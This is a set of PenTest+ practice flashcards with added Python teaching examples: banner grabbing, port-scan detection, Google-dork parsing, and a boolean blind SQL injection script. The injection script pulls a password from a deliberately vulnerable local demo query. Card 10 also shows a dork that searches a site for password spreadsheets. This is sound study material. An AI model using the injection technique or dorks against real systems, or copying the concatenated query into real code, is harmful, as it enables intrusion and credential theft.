CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dions 1of6) Flashcards

1
Q

Dion Training hosts its new web applications on AWS Lambda. You have been contracted to perform a penetration test against this new web application. What target type would this engagement be classified as?

A.On-Site
B.Internal
C.First-party hosted
D.Third-party hosted

A

D.Third-party hosted

Explanation:

OBJ-1.3: Third-party hosted target types are used when a vendor or partner of the client organization hosts the targeted network or system. In this scenario, Dion Training uses AWS Lambda for hosting its web application. Therefore, this is classified as a third-party hosted target type. This is important to consider before beginning the assessment since the third-party also must consent and agree to the penetration test since they host the systems involved.

2
Q

You are planning an engagement with a new client. Which target type should be selected to simulate an APT?

A.Internal
B.On-site
C.Third-party hosted
D.External

A

D.External

Explanation:
OBJ-1.3: An advanced persistent threat (APT) is a threat actor that uses multiple attack vectors to gain and maintain unauthorized access to sensitive resources over a long period. APTs are often funded by nation-states and used for intelligence-gathering operations against government, military, and commercial networks. Because an APT starts outside the organization and works its way in, simulating one is an external target type.

3
Q

Which of the following directly impacts the budgetary requirements of a penetration test?

A.Scope
B.Compliance
C.Schedule
D.Tolerance to Impact

A

A.Scope

Explanation:
OBJ-1.1: The scope has a direct impact on the budgetary requirements of a penetration test. If the scope is smaller, the budget required will be lower. If the scope is larger, then the budget also needs to be larger to support it. The scope can drive the cost, but often a fixed budget is already provided by an organization. In this case, the budget will remain constant, but the scope will shrink to fit within the resources available.

4
Q

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?

A.There are no new risks due to the install and the company has a stronger physical security posture
B.These devices should be isolated from the rest of the enterprise network
C.These devices should be scanned for viruses before installation
D.These devices are insecure and should be isolated from the internet

A

B.These devices should be isolated from the rest of the enterprise network

Explanation:
OBJ-1.3: While the physical security posture of the company has definitely been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and locks on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

5
Q

What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software?

A.XCCDF
B.CPE
C.CCE
D.CVE

A

D.CVE

Explanation:
OBJ-2.1: The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

6
Q
Which of the following is a special type of embedded operating system that uses a predictable and consistent scheduler?
A.Mobile
B.IoT
C.RTOS
D.PoS
A

C.RTOS

Explanation:
OBJ-2.5: A real-time operating system (RTOS) is a special type of embedded OS. An RTOS is ideal for embedded systems because they tend to have strict requirements for when a task must be completed and do not have particularly taxing workloads. An RTOS uses a predictable and consistent (deterministic) scheduler, unlike a general-purpose OS such as Windows or macOS.

7
Q

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company?

A.WHOIS lookups
B.Banner grabbing
C.BGP Looking Glass
D.Registrar Checks

A

B.Banner grabbing

Explanation:
OBJ-2.1: Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization’s remote host.
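
The point of the card is that banner grabbing touches the target. The following added example (not from the original page) makes that visible: it starts a throwaway listener on localhost that plays the target service and records every peer that connects, then grabs its banner the way a tester would. The banner text, the port, and the `start_fake_service`/`grab_banner` names are assumptions made for this example.

```python
import socket
import threading

# Constructed stand-in for the target host: a TCP listener on localhost that
# speaks an SSH-style greeting. The banner text is an assumption for this example.
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.4p1 Debian-5\r\n"


def start_fake_service(banner=FAKE_BANNER):
    """Listen on an ephemeral localhost port and answer a single client.
    Returns the port and a list that records who connected: this list is the
    equivalent of the target's own connection log, which is exactly why banner
    grabbing counts as active reconnaissance."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    connection_log = []

    def serve():
        conn, peer = srv.accept()
        connection_log.append(peer)   # the target sees the tester's address
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, connection_log


def grab_banner(host, port, timeout=3.0, probe=None):
    """Open a TCP connection and read whatever the service volunteers.
    Services such as SSH, FTP and SMTP speak first; HTTP only answers after a
    request, so an optional probe (e.g. b"HEAD / HTTP/1.0\\r\\n\\r\\n") can be sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        data = s.recv(1024)
    return data.decode(errors="replace").strip()


def demo():
    """Grab the banner from the constructed service and report how many
    connections the 'target' logged while we did it."""
    port, log = start_fake_service()
    banner = grab_banner("127.0.0.1", port)
    return banner, len(log)


if __name__ == "__main__":
    print(demo())
```

The WHOIS, registrar and BGP looking-glass checks in the other options never produce an entry in a list like `connection_log`, because they query third parties rather than the target.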

8
Q
David noticed that port 3389 was open on one of the POS terminals in a store during a scheduled PCI compliance scan. Based on the scan results, what service should he expect to find enabled on this terminal?
A.MySQL
B.RDP
C.LDAP
D.IMAP
A

B.RDP

Explanation:
OBJ-2.5: Port 3389 is the default port for the Remote Desktop Protocol (RDP). If this port isn’t supposed to be open on a POS terminal, the incident response plan should be the next step, since RDP can be used for remote access by an attacker. MySQL runs on port 3306, LDAP on port 389, and IMAP on port 143 (993 for IMAP over SSL/TLS).

9
Q
Which of the following is the most difficult to confirm with an external vulnerability scan?
A.Cross-site Scripting (XSS)
B.Cross-site Request Forgery (XSRF/CSRF)
C.Blind SQL Injection
D.Unpatched web server
A

C.Blind SQL Injection

Explanation:
OBJ-2.2: In a blind SQL injection the application returns neither an error message nor any query data in its response; the attacker can only infer the result of the injected condition from a yes/no difference in the page or from a time delay. A scanner therefore has to send many carefully sequenced requests and compare subtle differences in the responses to confirm the flaw, and it frequently cannot do so reliably from outside the network. XSS and CSRF/XSRF are typically easier to detect because the scanner can see its injected payload reflected in the response or observe a missing anti-CSRF token. An unpatched web server can usually be identified from its banner information.
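
To show why a yes/no response is enough for an attacker yet hard for a scanner to confirm, here is an added example (not from the original page or any of the products it mentions). An in-memory SQLite database stands in for the target’s backend; `user_exists` is a deliberately vulnerable lookup that leaks only a boolean, and `extract_password` recovers a stored value from that boolean one character at a time. The table, the data, and all function names are assumptions for this example.

```python
import sqlite3
import string

# Constructed demo database standing in for the target's backend.
SETUP_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'Hunter2!');
INSERT INTO users VALUES (2, 'alice', 'secret');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP_SQL)
    return conn


def user_exists(conn, username):
    """Deliberately vulnerable: SQL built by string concatenation. The caller only
    learns whether a row matched, which is what makes the injection 'blind'."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, username):
    """Hardened form: a parameterised query, so the input is never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def extract_password(oracle, target_user, max_len=32):
    """Boolean-based blind extraction. `oracle(payload)` answers True/False only.
    For each position we ask 'is character N of the password equal to X?' via
    substr(); the first True reveals the character, no True means end of string."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            payload = (
                f"{target_user}' AND substr(password,{pos},1)='"
                + ch.replace("'", "''")   # keep the literal valid if ch is a quote
                + "'--"                   # comment out the application's closing quote
            )
            if oracle(payload):
                found = ch
                break
        if found is None:
            break
        recovered += found
    return recovered


def demo():
    """Run the extraction against the vulnerable lookup and count how many
    near-identical yes/no requests it took to recover one value."""
    conn = make_db()
    requests = [0]

    def oracle(payload):
        requests[0] += 1
        return user_exists(conn, payload)

    return extract_password(oracle, "admin"), requests[0]


if __name__ == "__main__":
    print(demo())
```

Against `user_exists_safe` the same payloads are just an unusual username and extract nothing; against `user_exists` they recover the whole value, but only as dozens of requests that each differ by one character, which is the pattern a scanner has to recognise and verify from the outside.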

10
Q

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and saw them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE)

A.All search filters are deactivated
B.Returns only files hosted at diontraining.com
C.Returns only Microsoft Excel spreadsheets
D.Find sites related to diontraining.com
E.Excludes Microsoft Excel Spreadsheets
F.Personalization is turned off

A

B.Returns only files hosted at diontraining.com
C.Returns only Microsoft Excel spreadsheets
F.Personalization is turned off

Explanation:
OBJ-2.1: The above example searches for the term “password” (q=password) and (+) restricts results to files with a type of xls (filetype%3Axls, where %3A is the URL-encoded ‘:’) and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by adding -filetype%3Axls to the search query. To find related websites or pages, you would include the “related:” term in the query. To deactivate all filters from the search, “filter=0” should be used; “filter=p” deactivates only the directory filtering function.

11
Q

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital’s enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital’s elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend?

A.Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack
B.Recommend isolation of the elevator control system from the rest of the production network through the change control process
C.Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists
D.Recommend immediate disconnection of the elevators control system from the enterprise network

A

B.Recommend isolation of the elevator control system from the rest of the production network through the change control process

Explanation:
OBJ-2.5: The best recommendation is to logically or physically isolate the elevator control system from the rest of the production network and the internet. This should be done through the change control process, which brings the appropriate stakeholders together to decide how best to mitigate the vulnerability while defining the business impact and risk of the decision. Sudden disconnection of the PLCs from the rest of the network might have disastrous results (i.e., sick and injured people trapped in an elevator) if the PLCs depended on resources elsewhere in the network. Replacement of the elevator controllers may be prohibitively expensive and time-consuming, and likely something the hospital could not justify to mitigate this one vulnerability. Attempting further exploitation of the buffer overflow vulnerability might inadvertently trap somebody in an elevator or cause damage to the elevators themselves.

12
Q

An organization is currently accepting bids for a contract that will involve penetration testing and reporting. The organization is asking all bidders to provide proof of previous penetration testing and reporting experience. One contractor decides to print out a few reports from some previous penetration tests that they performed. What could have occurred as a result of this contractor’s actions?

A.The contractor will have their bid accepted with a special pay bonus because of their excellent work on previous pentests
B.The contractor may have inadvertently exposed numerous vulnerabilities they have found at other companies on previous assessments
C.The organization accepting the bids will want to use the reports as an example of the format for all bidders to use in the future
D.The company accepting the bids will hire the contractor because of the quality of the reports he submitted with this bid

A

B.The contractor may have inadvertently exposed numerous vulnerabilities they have found at other companies on previous assessments

Explanation:
OBJ-1.2: Pentesters should never disclose any information from previous penetration tests to anyone outside of the assessed organization since this could expose the vulnerability found. This non-disclosure is usually outlined in the original contract and scope of work. If the contractor wishes to provide a sample report, then the report should be created specifically for the contract and only include information from a sample/test network, not a previous customer’s assessment. This could also be in breach of the NDA between the pentester and the organization, as well.

13
Q

Dion Training has contracted you to conduct a penetration test of its web application hosted within AWS Lambda. Part of the assessment will include stress testing the web application using a simulated DDoS attack. Which of the following entities would be the proper signing authority for this penetration test?

A.Dion Training’s representative since they hired you
B.Amazon’s representative since they host the servers
C.Both organizations’ representatives since one is your client and the other hosts the servers
D.Neither organization’s representatives since you are simulating a DDoS

A

C.Both organizations’ representatives since one is your client and the other hosts the servers

Explanation:
OBJ-1.2: Written authorization documents help control the amount of liability incurred by the penetration tester. You must ensure you have the correct authorization in place before beginning your engagement. You ALWAYS need written authorization from your client. If the client uses a third-party service provider, then you may need to also get proper authorization from them in writing too. During your engagement planning, you should contact the third-party service provider to determine if written consent is required. In the case of Amazon, there are a handful of services that do not require prior authorization before conducting a penetration test on behalf of your client. DoS and DDoS attacks and simulations do require written authorization from both your client and Amazon. If you do not have this, you could be held liable for any negative consequences to Amazon and its client’s servers or even be charged with criminal computer hacking.

14
Q

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft’s regular patch. Which of the following options would be best to ensure the system remains protected and are compliant with the rules outlined by the PCI DSS?

A.Replace the Windows POS terminals with standard Windows systems
B.Build a custom OS image that includes the patch
C.Identify, implement and document compensating controls
D.Remove the POS terminals from the network until the vendor releases a patch

A

C.Identify, implement and document compensating controls

Explanation:
OBJ-1.4: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

15
Q

You are working as a penetration tester and have discovered a new method of exploiting a vulnerability within the Windows 10 operating system. You conduct some research online and discover that a security patch against this particular vulnerability doesn’t exist yet. Which type of threat would this BEST be categorized as?

A.Zero-day
B.DDoS
C.Brute force
D.Spoofing

A

A.Zero-day

Explanation:
OBJ-1.3: A zero-day vulnerability is a flaw for which no patch is yet available; a zero-day exploit or attack uses that flaw before the developer has had a chance to fix it, hence the term zero-day (the vendor has had zero days to respond). DDoS, brute force, and spoofing are attack techniques and say nothing about whether a patch exists.

16
Q

You have been contracted to perform a web application assessment. You believe the best way to exploit the application is to provide it a specially crafted XML file. The application normally allows users to import XML-based files and then parses them during ingestion. Which of the following support resources should you request from the organization before starting your assessment?

A.Soap Project File
B.Architectural diagrams
C.Authorization to use a fuzzer
D.An XSD file

A

D.An XSD file

Explanation:
OBJ-1.1: Since the scenario states that you will create a specially crafted XML file for the assessment, you will need to know the XML file structure the web application expects. An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents. If the company provides this support resource to you, you will know the exact format expected by the application, which can save you a lot of time, and the organization a lot of expense during the assessment.

17
Q

A project manager is tasked with the planning of a new network installation. The customer requires that everything discussed in the meetings is installed and configured when a network engineer arrives onsite. Which document should the project manager provide the customer?

A.Acceptable Use Policy
B.Service Level Agreement
C.Statement of Work
D.Security Policy

A

C.Statement of Work

Explanation:
OBJ-1.2: A Statement of Work (SOW) is a document that outlines all the work that is to be performed, as well as the agreed-upon deliverables and timelines.

18
Q

An organization wants to get an external attacker’s perspective on their security status. Which of the following services should they purchase?

A.Vulnerability Scan
B.Asset Management
C.Pentest
D.Patch Management

A

C.Pentest

Explanation:
OBJ-1.4: Penetration tests provide an organization with an external attacker’s perspective on their security status. The NIST process for penetration testing divides tests into four phases: planning, discovery, attack, and reporting. The penetration test results are valuable security planning tools, as they describe the actual vulnerabilities that an attacker might exploit to gain access to a network. A vulnerability scan enumerates known weaknesses but does not attempt to exploit them, so it does not show what an attacker could actually achieve. Asset management refers to a systematic approach to the governance and realization of value from the things that a group or entity is responsible for over their whole life cycles; it may apply both to tangible and intangible assets. Patch management is the process that helps acquire, test, and install multiple patches (code changes) on existing applications and software tools, enabling systems to stay current and determining which patches are the appropriate ones.

19
Q

Which of the following rules of engagement provides the scope and limitation of the penetration test?

A.Timeline
B.Location of the team
C.Temporal restrictions
D.Test boundaries

A

D.Test boundaries

Explanation:
OBJ-1.1: The test boundaries are used to define the acceptable actions and scope used during an engagement. For example, it will define whether servers, endpoints, or both will be in the scope of the attack. It may also dictate whether only technical means may be used for exploitation or if social engineering can also be utilized.

20
Q

Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of activity occurred based on the output above?

A.Port scan targeting 10.10.3.2
B.Fragmentation attack targeting 10.10.3.6
C.Denial of service attack targeting 10.10.3.6
D.Port scan targeting 10.10.3.6

A

D.Port scan targeting 10.10.3.6

Explanation:
OBJ-2.1: Port scanning is the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between most attempts. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making “Port scan targeting 10.10.3.6” the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overwhelms a target by abusing datagram fragmentation and reassembly. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.
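
The reasoning in the explanation (one source, one destination, many distinct ports in a short time) is what a detection rule encodes. The following added example, which is not from the original page, parses log lines in the card’s format and flags source/destination pairs that hit at least five distinct ports within a sliding 60-second window. The sample input re-types the card’s nine lines and adds one constructed benign line from 10.10.3.9; the thresholds and the function names are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the card's nine lines plus one unrelated connection.
SAMPLE_LOG = """\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:30:00 Port:443 Source: 10.10.3.9 Destination:10.10.3.6 Protocol:TCP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"""

LINE_RE = re.compile(
    r"Time:\s*(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\s+"
    r"Port:\s*(?P<port>\d+)\s+Source:\s*(?P<src>[\d.]+)\s+"
    r"Destination:\s*(?P<dst>[\d.]+)\s+Protocol:\s*(?P<proto>\w+)"
)


def parse_log(text):
    """Turn the log into event dicts; separator lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S"),
            "port": int(m["port"]),
            "src": m["src"],
            "dst": m["dst"],
            "proto": m["proto"],
        })
    return events


def detect_port_scans(events, min_ports=5, window_seconds=60):
    """Flag each (src, dst) pair that touched at least `min_ports` distinct ports
    inside a `window_seconds` sliding window. One finding per pair, describing
    every port that pair touched and how long the whole sequence took."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e)

    findings = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # advance the window start until it fits within window_seconds
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window_ports = {e["port"] for e in evs[start:end + 1]}
            if len(window_ports) >= min_ports:
                findings.append({
                    "src": src,
                    "dst": dst,
                    "ports": sorted({e["port"] for e in evs}),
                    "first": evs[0]["ts"],
                    "last": evs[-1]["ts"],
                    "duration_s": (evs[-1]["ts"] - evs[0]["ts"]).total_seconds(),
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect_port_scans(parse_log(SAMPLE_LOG)):
        print(f"port scan from {f['src']} against {f['dst']}: "
              f"{len(f['ports'])} ports in {f['duration_s']:.0f}s -> {f['ports']}")
```

The single hit from 10.10.3.9 never reaches the threshold, so only the 10.10.3.2 sequence is reported; raising `min_ports` or shrinking the window is how you trade sensitivity against false positives on a busy network.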

21
Q

A new alert has been distributed throughout the information security community regarding a critical Apache vulnerability. What action could you take to ONLY identify the known vulnerability?

A.Perform an unauthenticated vulnerability scan on all servers in the environment
B.Perform a scan for the specific vulnerability on all web servers
C.Perform a web vulnerability scan on all servers in the environment
D.Perform an authenticated scan on all web servers in the environment

A

B.Perform a scan for the specific vulnerability on all web servers

Explanation:
OBJ-2.2: Since you wish to check for only the known vulnerability, you should scan for that specific vulnerability on all web servers. All web servers are chosen because Apache is a web server application. While performing an authenticated scan of all web servers or performing a web vulnerability scan of all servers would also find these vulnerabilities, it is a much larger scope. It would waste time and processing power by conducting these scans instead of properly scoping the scans based on your needs. Performing unauthenticated vulnerability scans on all servers is also too large in scope (all servers) while also being less effective (unauthenticated scan).

22
Q

What is the BEST explanation for why consumer-based IoT devices are less secure than traditional desktops and servers?

A.IoT devices are unable to receive patches and updates
B.IoT devices focus convenience more than security
C.IoT devices are not powerful enough to support encryption
D.IoT devices are only used in low security cases

A

B.IoT devices focus convenience more than security

Explanation:
OBJ-2.5: IoT device manufacturers are more focused on making the devices convenient to use instead of ensuring they have strong security. The other options are incorrect and not true. IoT devices can receive patches and updates through an over-the-air firmware update if a manufacturer creates the patches. IoT devices are powerful these days, and they can support encryption and other security features if manufacturers would add them to their code. IoT devices are not just used in low-security use cases, either. For example, IoT devices are often used as life-saving devices in hospitals or security systems in our homes. Unfortunately, IoT devices are notoriously lax when it comes to security. Some IoT systems may even allow a user full remote control of a device.

23
Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A.Man-in-the-middle attack
B.Brute-force attack
C.Dictionary attack
D.Session hijacking

A

C.Dictionary attack

Explanation:
OBJ-2.4: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

24
Q

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
# nmap diontraining012 
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports

PORT STATE
135/tcp open
139/tcp open
445/tcp open

Based on these results, which of the following operating system is most likely being run by this workstation?

A.Ubuntu
B.macOS
C.CentOS
D.Windows

A

D.Windows

Explanation:
OBJ-2.1: The workstation is most likely running a version of the Windows operating system. Port 135 is the Microsoft RPC endpoint mapper, port 139 is the NetBIOS session service, and port 445 is SMB directly over TCP; this trio has been open by default on Windows systems since Windows 2000, when SMB over TCP/445 was introduced. A Linux (Ubuntu, CentOS) or macOS host would only expose 139/445 if Samba or file sharing had been deliberately enabled, and 135 is rarely seen outside Windows.

25
Q

Which of the following is NOT a valid reason to conduct reverse engineering?

A.To commit industrial espionage
B.To determine how a piece of malware operates
C.To allow the software developer to spot flaws in their source code
D.To allow an attacker to exploit vulnerabilities in an executable

A

C.To allow the software developer to spot flaws in their source code

Explanation:
OBJ-2.1: If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information about how the malware propagates and its primary directives. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

26
Q

A system administrator wants to verify that external IP addresses cannot collect software versioning from servers on the network. Which of the following should the system administrator do to confirm the network is protected?

A.Analyze packet captures
B.Utilize netstat to locate active connections
C.Use nmap to query known ports
D.Review the IDS logs on the network

A

A.Analyze packet captures

Explanation:
OBJ-2.1: Capturing packets at the network edge and inspecting the responses shows exactly what an outside host receives from your servers: service banners, HTTP Server headers, SSH version strings, and similar. If version strings appear in traffic to external addresses, the information is leaking, regardless of what the servers are supposed to be configured to do. netstat only lists the active connections on a single host, nmap queries ports from the outside (and is itself the kind of probe you are trying to defend against, so it tells you a port answers but not everything a full capture reveals), and IDS logs only record what a sensor was configured to alert on.

27
Q

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst?

A.Web application vulnerability scan
B.Database vulnerability scan
C.Port scan
D.Network Vulnerability Scan

A

A.Web application vulnerability scan

Explanation:
OBJ-2.2: Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn’t contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.

28
Q

A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and saw them enter the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A.Returns no useful results from an attacker
B.Returns all web pages containing the text diontraining.com
C.Returns all web pages containing an email address affiliated with diontraining.com
D.Returns all web pages hosted at diontraining.com

A

C.Returns all web pages containing an email address affiliated with diontraining.com

Explanation:
OBJ-2.1: Google interprets this statement as @diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the “site:” modifier in the query. To return all web pages with the text diontraining.com, enter “diontraining.com” into the Google search bar with no modifiers to return those results.
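
Both this card and the earlier `filetype:`/`site:` card come down to decoding a Google search URL into its operators and flags. The following added example, which is not from the original page, does that decoding with the standard library: `urllib.parse.parse_qs` already turns `%3A` into `:`, `%40` into `@`, and `+` into a space, after which each term is classified as a keyword, a positive operator, or a negated (`-`) operator, and the non-query parameters (`pws`, `filter`) are reported as flags. The operator list and the function names are assumptions for this example; `site:` and `filetype:` are the operators the cards use, the others are common Google operators included for completeness.

```python
from urllib.parse import urlparse, parse_qs

# Operators recognised as "name:value" terms. site: and filetype: appear in the
# cards; the rest are other common Google operators (assumption: this list is
# illustrative, not exhaustive).
OPERATORS = ("site", "filetype", "ext", "related", "inurl", "intitle", "intext", "cache")


def parse_dork_url(url):
    """Decode a Google search URL into keywords, operators, negated operators and
    the non-query flags an analyst cares about (pws=0 disables personalisation,
    filter controls result filtering)."""
    qs = parse_qs(urlparse(url).query)        # percent-decodes and turns '+' into ' '
    query = qs.get("q", [""])[0]
    result = {"keywords": [], "operators": {}, "excluded": {}, "flags": {}}
    for term in query.split():
        negated = term.startswith("-")
        body = term[1:] if negated else term
        op, sep, value = body.partition(":")
        if sep and value and op.lower() in OPERATORS:
            bucket = result["excluded"] if negated else result["operators"]
            bucket.setdefault(op.lower(), []).append(value)
        else:
            result["keywords"].append(term)   # '*@diontraining.com' lands here
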